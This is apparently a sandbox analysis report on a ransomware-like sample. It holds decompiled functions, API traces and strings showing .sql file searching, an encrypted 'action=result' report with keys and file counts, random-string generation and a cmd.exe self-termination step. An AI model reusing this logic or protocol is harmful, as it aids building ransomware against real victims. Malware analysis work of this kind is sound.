MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,772969A0,00000000), ref: 0FBC5AF0
lstrcatW.KERNEL32(?,&priv_key=), ref: 0FBC5AFC
lstrlenW.KERNEL32(?), ref: 0FBC5AFF
lstrlenA.KERNEL32(00000000), ref: 0FBC5B0C
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,772969A0,00000000), ref: 0FBC5B21
lstrcatW.KERNEL32(?,&version=2.3r), ref: 0FBC5B2D
lstrlenW.KERNEL32(?), ref: 0FBC5B39
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0FBC5B4D
lstrlenW.KERNEL32(?), ref: 0FBC5B5D
lstrlenW.KERNEL32(?), ref: 0FBC5B7E
_memset.LIBCMT ref: 0FBC5BC7
lstrlenA.KERNEL32(?), ref: 0FBC5BDA

Part of subcall function 0FBC5D70: _memset.LIBCMT ref: 0FBC5D9D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0FBC5C26
GetLastError.KERNEL32 ref: 0FBC5C30
lstrlenA.KERNEL32(?), ref: 0FBC5C37
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FBC5C46
lstrlenA.KERNEL32(?), ref: 0FBC5C51
lstrlenA.KERNEL32(?), ref: 0FBC5C71
lstrlenA.KERNEL32(?), ref: 0FBC5C94
lstrlenA.KERNEL32(00000000), ref: 0FBC5CA3
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0FBC5CB4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5CE7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5CF4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D01
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D26
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D33
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D40
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5D5A

Strings

&priv_key=, xrefs: 0FBC5AF6
&version=2.3r, xrefs: 0FBC5B27
&pub_key=, xrefs: 0FBC5AC9
#shasj, xrefs: 0FBC5B80
action=call&, xrefs: 0FBC5AAB

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
API String ID: 2781787645-472827701
Opcode ID: 2c83c2689cb65c2c5c10f742b612afc6482e88eda0af9a6b55422d3a3265696e
Instruction ID: 8ca30d3db2fa103cd527477c7f3ad3f359090349a24468e685995ad0d8441cd7
Opcode Fuzzy Hash: 2c83c2689cb65c2c5c10f742b612afc6482e88eda0af9a6b55422d3a3265696e
Instruction Fuzzy Hash: 7AE1CC71108305AFD720CF25EC80BABBBE9EF88754F04495CF585A7291D774A905CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6A40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC6A40(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FBC8100(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0FBC69E0(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6A52
lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6A64
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6A72
lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6A9C
lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6AB2
lstrcatW.KERNEL32(00000000,?), ref: 0FBC6AC4
lstrlenW.KERNEL32(00000000,?,?), ref: 0FBC6ACB
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBC6AFA
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBC6B11
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBC6B1C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBC6B3A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBC6B4F
lstrlenA.KERNEL32(*******************,?,?), ref: 0FBC6B6E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBC6B89
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBC6B93
FindNextFileW.KERNEL32(?,?,?,?), ref: 0FBC6BBC
FindClose.KERNEL32(?,?,?), ref: 0FBC6BCD

Strings

.sql, xrefs: 0FBC6AF4
*******************, xrefs: 0FBC6B59, 0FBC6B69

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 37504927479e82b3bb79914cfb5ab0ac66e3c037fccc24e5156cd091e500d72a
Instruction ID: 43998a4b7b1806e3bd6afa131c5ef269e013f442e5a5be2c8d07d1e4c094a08c
Opcode Fuzzy Hash: 37504927479e82b3bb79914cfb5ab0ac66e3c037fccc24e5156cd091e500d72a
Instruction Fuzzy Hash: D641A271A0021AABDB209F65AC59FBB77ADEF48751F4040D9F905E3141DB78AA128FE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5670 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0FBC5670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t88 = __edx;
				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E0FBC39F0( &_v180);
				E0FBC7330( &_v180, _t88);
				E0FBC7140( &_v180);
				E0FBC6F40( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xfbcfc78]");
				_v28 = _t79;
				_t80 =  *0xfbcfc84; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xfbcfc86; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E0FBC9010( &_v435, 0, 0xff);
				E0FBC5D70( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E0FBC5E20( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E0FBC54A0(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0FBC7C10( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FBC568F
wsprintfW.USER32 ref: 0FBC56BD
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBC570C
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBC571E
_memset.LIBCMT ref: 0FBC5761
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0FBC576D
CryptBinaryToStringA.CRYPT32(?,772969A0,40000001,00000000,00000000), ref: 0FBC57B2
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57BC
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57C9
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57D8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57E2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57FF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC5818
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC5850
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC5867

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FBC56B7
#shasj, xrefs: 0FBC5720

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 77cbd088bd4338bb51c0d390eb5b7ef084297accec89f3bf2dc13a3c8cc7a4e9
Instruction ID: 07f48035be0b3e4198190c463b4ba0898ef355f3494ae67a50634b21b9fc537a
Opcode Fuzzy Hash: 77cbd088bd4338bb51c0d390eb5b7ef084297accec89f3bf2dc13a3c8cc7a4e9
Instruction Fuzzy Hash: 3E51AF71A00219ABEB209B65EC45FEF7B79EF48700F1400E8EA05A7181EB747A15CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5210 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0FBC5210(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				long _v12;
				char _v14;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				CHAR** _v32;
				void* _v36;
				char _v291;
				char _v292;
				void* _v348;
				void* _v352;
				int _t43;
				BYTE* _t44;
				int _t46;
				void* _t50;
				void* _t51;
				char _t52;
				void* _t64;
				signed int _t66;
				signed int _t68;
				int _t69;
				int _t72;
				char _t74;
				intOrPtr _t75;
				CHAR* _t84;
				char* _t86;
				void* _t88;
				signed char _t89;
				WCHAR* _t94;
				CHAR* _t95;
				BYTE* _t101;
				WCHAR* _t102;
				WCHAR* _t103;
				void* _t104;
				long _t105;
				long _t106;
				int _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;

				_t86 = __ecx;
				_v32 = __edx;
				_t43 = lstrlenA(__ecx) + 1;
				_v8 = _t43;
				_t3 = _t43 + 1; // 0x2
				_t105 = _t3;
				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
				_v36 = _t44;
				if(_t44 == 0 || _v8 >= _t105) {
					_t101 = 0;
					__eflags = 0;
				} else {
					_t101 = _t44;
				}
				_t106 = 0;
				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
				_t119 = _t46;
				if(_t46 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t50 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xfbcfc78]");
					_t107 = _v8;
					_v20 = _t50;
					_t51 =  *0xfbcfc84; // 0x6a73
					_v16 = _t51;
					_t52 =  *0xfbcfc86; // 0x0
					_v14 = _t52;
					asm("movq [ebp-0x18], xmm0");
					_v292 = 0;
					E0FBC9010( &_v291, 0, 0xff);
					E0FBC5D70( &_v292,  &_v28, lstrlenA( &_v28));
					E0FBC5E20( &_v292, _t101, _t107);
					_t94 =  &_v28;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x18], xmm0");
					E0FBC33E0(_t94, _t119, _t101);
					if(_v28 != 0) {
						E0FBC5190();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(lstrlenA);
						_push(_t107);
						_push(_t101);
						_t102 = _t94;
						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v352 = _t108;
						GetModuleFileNameW(0, _t108, 0x200);
						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
						_v348 = _t88;
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
							_v28 = _t64;
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
								_v16 = _t66;
								__eflags = _t66;
								if(_t66 != 0) {
									_t29 = _t66 + 0x4e; // 0x4e
									_t109 = _t29;
									_v12 = _t109;
									_t68 = lstrlenW(_t102);
									_t89 = 0;
									_t103 =  &(_t102[_t68]);
									_t69 = lstrlenA(_t109);
									__eflags = _t69 + _t69;
									if(_t69 + _t69 != 0) {
										_t95 = _t109;
										do {
											__eflags = _t89 & 0x00000001;
											if((_t89 & 0x00000001) != 0) {
												 *((char*)(_t103 + _t89)) = 0;
											} else {
												_t74 =  *_t109;
												_t109 =  &(_t109[1]);
												 *((char*)(_t103 + _t89)) = _t74;
											}
											_t89 = _t89 + 1;
											_t72 = lstrlenA(_t95);
											_t95 = _v12;
											__eflags = _t89 - _t72 + _t72;
										} while (_t89 < _t72 + _t72);
									}
									UnmapViewOfFile(_v16);
									_t88 = _v20;
									_t108 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t88);
						}
						return VirtualFree(_t108, 0, 0x8000);
					} else {
						_t104 = _v24;
						_t75 =  *0xfbd2a60; // 0x0
						_t110 = _v20;
						_t76 =  !=  ? 0 : _t75;
						_v12 = 1;
						 *0xfbd2a60 =  !=  ? 0 : _t75;
						if(_t110 != 0) {
							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
							 *_v32 = _t84;
							if(_t84 != 0) {
								lstrcpyA(_t84, _t110);
							}
						}
						_t77 = GetProcessHeap;
						if(_t104 != 0) {
							HeapFree(GetProcessHeap(), 0, _t104);
							_t77 = GetProcessHeap;
						}
						if(_t110 != 0) {
							HeapFree( *_t77(), 0, _t110);
						}
						_t106 = _v12;
						L14:
						VirtualFree(_v36, 0, 0x8000);
						return _t106;
					}
				}
			}

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 0FBC5222
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FBC5239
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FBC525E
_memset.LIBCMT ref: 0FBC52AB
lstrlenA.KERNEL32(?), ref: 0FBC52BD
lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0FBC5324
VirtualAlloc.KERNEL32(00000000,00000001), ref: 0FBC532A
lstrcpyA.KERNEL32(00000000,?), ref: 0FBC533B
HeapFree.KERNEL32(00000000), ref: 0FBC5356
HeapFree.KERNEL32(00000000), ref: 0FBC5367
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5376
GetLastError.KERNEL32 ref: 0FBC5385

Part of subcall function 0FBC5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FBC5392,00000000), ref: 0FBC51A6
Part of subcall function 0FBC5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC51B8
Part of subcall function 0FBC5190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FBC51C8
Part of subcall function 0FBC5190: wsprintfW.USER32 ref: 0FBC51D9
Part of subcall function 0FBC5190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FBC51F3
Part of subcall function 0FBC5190: ExitProcess.KERNEL32 ref: 0FBC51FB

Strings

#shasj, xrefs: 0FBC526C

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
String ID: #shasj
API String ID: 834684195-2423951532
Opcode ID: 26df987859a946e9d6baf1d69b3a714ec7f48bc46801b8badc22340f95049042
Instruction ID: 0f6b1d61454d4d449db6952286125fe3658e4741ab99dea6b0dd3571dae2f4f4
Opcode Fuzzy Hash: 26df987859a946e9d6baf1d69b3a714ec7f48bc46801b8badc22340f95049042
Instruction Fuzzy Hash: 9E41A971A00219AFDB219BA6AC44BEF7BBCFF49711F040199E905E7241DB78A951CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC8150 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0FBC8150(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						goto L15;
					}
				}
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC816D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBC819B
GetModuleHandleA.KERNEL32(?), ref: 0FBC81EF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC81FD
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC820C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8255
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8263
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8277
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8285

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0FBC8207, 0FBC820A
Advapi32.dll, xrefs: 0FBC81F9, 0FBC81FC

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 2f88a0b68a0132414fe732e0b4292ade13d6c898f3c3941ace4935ba6b5f9af9
Instruction ID: e3dbaa0d50a41ce713404b77e9522ea64f8cd891d5e9c89bc397128343545414
Opcode Fuzzy Hash: 2f88a0b68a0132414fe732e0b4292ade13d6c898f3c3941ace4935ba6b5f9af9
Instruction Fuzzy Hash: 7C31D574A00209ABDB109FE6EC59BEFBB7CEF49711F1040ADE905A6141D734D611CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC82A0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0FBC82A0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

APIs

